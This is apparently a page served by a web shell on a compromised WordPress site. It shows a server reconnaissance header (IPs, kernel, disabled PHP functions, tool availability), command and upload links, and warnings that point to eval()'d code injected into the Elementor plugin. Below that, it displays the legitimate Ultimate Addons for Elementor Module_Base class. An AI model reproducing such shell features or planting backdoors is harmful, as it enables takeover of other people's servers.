|
Server IP : 172.19.0.4 / Your IP : 216.73.216.172 Web Server : nginx/1.28.3 System : Linux VM-0-4-debian 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/data1/wwwroot/sc-forklift.com/:/tmp/) in /data1/wwwroot/sc-forklift.com/wp-content/plugins/elementor/elementor.php(1) : eval()'d code on line 341 OFF Directory (0755) : /data1/wwwroot/sc-forklift.com/wp-content/plugins/ultimate-elementor/base/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* UAEL Module Base.
*
* @package UAEL
*/
namespace UltimateElementor\Base;
use UltimateElementor\Classes\UAEL_Helper;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Module Base
*
* @since 0.0.1
*/
abstract class Module_Base {
/**
* Reflection
*
* @var reflection
*/
private $reflection;
/**
* Reflection
*
* @var instances
*/
protected static $instances = array();
/**
* Get Name
*
* @since 0.0.1
*/
abstract public function get_name();
/**
* Class name to Call
*
* @since 0.0.1
*/
public static function class_name() {
return get_called_class();
}
/**
* Check if this is a widget.
*
* @since 1.12.0
* @access public
*
* @return bool true|false.
*/
public function is_widget() {
return true;
}
/**
* Class instance
*
* @since 0.0.1
*
* @return static
*/
public static function instance() {
$class_name = static::class_name();
if ( empty( static::$instances[ $class_name ] ) ) {
static::$instances[ $class_name ] = new static();
}
return static::$instances[ $class_name ];
}
/**
* Constructor
*/
public function __construct() {
$this->reflection = new \ReflectionClass( $this );
add_action( 'elementor/widgets/register', array( $this, 'init_widgets' ) );
}
/**
* Init Widgets
*
* @since 0.0.1
*/
public function init_widgets() {
$widget_manager = \Elementor\Plugin::instance()->widgets_manager;
foreach ( $this->get_widgets() as $widget ) {
if ( UAEL_Helper::is_widget_active( $widget ) ) {
$class_name = $this->reflection->getNamespaceName() . '\Widgets\\' . $widget;
if ( $this->is_widget() ) {
$widget_manager->register( new $class_name() );
}
}
}
}
/**
* Get Widgets
*
* @since 0.0.1
*
* @return array
*/
public function get_widgets() {
return array();
}
}